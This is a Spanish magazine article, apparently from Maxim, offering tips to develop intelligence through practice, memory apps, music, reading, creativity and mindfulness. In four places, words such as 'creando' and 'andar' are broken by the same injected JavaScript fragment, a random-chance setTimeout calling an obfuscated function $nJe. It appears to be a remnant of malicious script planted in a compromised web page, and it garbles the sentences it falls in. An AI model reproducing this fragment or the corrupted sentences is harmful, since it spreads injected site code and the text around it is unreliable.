Consejos para trabajar y mejorar la inteligencia

    Consejos para trabajar y mejorar la inteligencia

    ¡Aumenta tu inteligencia!

    Autor: Redacción Maxim 22 octubre, 2019


    FOTO: Shutterstock

     

    ¿Sabías que aún siendo adultos el cerebro puede seguir creandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando conexiones que te hagan más inteligente?

     

    Pues sí, la inteligencia es maleable y por lo tanto se puede trabajar y mejorar. Así que lee esta nota y descubre cómo desarrollar y mejorar tu inteligencia

     

     

    Primero que nada, define con qué tipo de inteligencia te identificas más o cuál te gustaría trabajar. Existen 7 y son las siguientes:

     

    Inteligencia lógico-matemática. Razonamiento deductivo y pensamiento lógico.

    Inteligencia lingüística. Manipulación de los lenguajes de forma efectiva para expresarse.

    Inteligencia espacial. Manipulación y creación de imágenes mentales para resolver  problemas.

    Inteligencia musical. Reconocer y componer música.

    Inteligencia cinético-corporal. Coordinación de los movimientos corporales.

    Inteligencia interpersonal. Comprensión de sentimientos interpersonales y las intenciones de los otros.

    Inteligencia intrapersonal. Entender los sentimientos y motivaciones propias.

    Según tus experiencias, hobbies o intereses te sentirás más identificado con alguna. Si hay más de una es normal, pues en realidad todas están conectadas. 

     

    Ahora sí, ¿cómo desarrollar la inteligencia?

    Primero, debes saber que tienes que trabajar muy duro. Necesitas practicar mucho alguna destreza. La mente requiere de aprendizaje y ejercicio contínuo para dominar algo. Así que no pienses que a la primera serás todo un maestro en lo que te propongas. 

     

     

    Entonces, escoge algo en lo que quieras destacar y piensa qué actividades podrían ayudarte a mejorar en ese ámbito. 

    En segundo lugar, debes practicar la auto eficacia, esto quiere decir que para que no abandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andones la práctica o te des por vencido, necesitas juicios autorreferidos que te motiven. Necesitas creer que lo vas a lograr para lograrlo. Pero también, necesitas ponerte metas alcanzables. 

     

     

    No todo es trabajo, trabajo

    Tu cerebro necesita ejercitarse como un músculo, así que te recomendamos bajar apps a tus dispositivos móviles que ejerciten tu memoria. La memoria y la inteligencia van de la mano y se necesitan mutuamente para desarrollarse. Otra forma es por medio de crucigramas, sudoku o aprender un idioma.  Te recomendamos la app Lumosity, la cual está dividida en memoria, atención, resolución de problemas, velocidad y flexibilidad de pensamiento. También existe Cognifit Brain Fitness, Brain Trainer Special y Eidetic.

     

     

     

    Otro tip excelente es escuchar música, y mejor si decides comenzar a tocar un instrumento pues esto mejorará muchísimo tus capacidades cognitivas y la plasticidad cerebral. 

    Leer es otro de los ejercicios que más se recomiendan para desarrollar la inteligencia, pues no solamente aporta cultura sino que expandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande la mente. Así que ya sabes, ponte a leer. 

     

     

    La creatividad es un aliado más. Deja que tu mente sea libre y plasma tus idea en un cuento, una pintura, una canción. Todo proceso creativo te va a ayudar a ser más inteligente

     

    Finamente, practica el mindfulness 

    Desarrolla la habilidad de desconectarte de todo y apagar el mundo exterior. Es básico que tu cerebro y mente tenga estos espacios para concentrarse y poder encontrar soluciones intuitivas. Sesiones de meditación te ayudarán mucho. Además, recuerda la frase de “mente sana en cuerpo sano”, así que también es importante alimentarse bien.

     

     

    Prescinde lo más que puedas de la tecnología pues aunque nos encantan los avances, éstos nos han hecho bastante flojos. Intenta andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andar sin GPS, o hacer una cuenta sin la calculadora.

     

    10 CONSEJOS PARA SER UNA PERSONA MENTALMENTE MÁS FUERTE

     

    Temas relacionados con esta nota: , , ,

¡Aumenta tu inteligencia!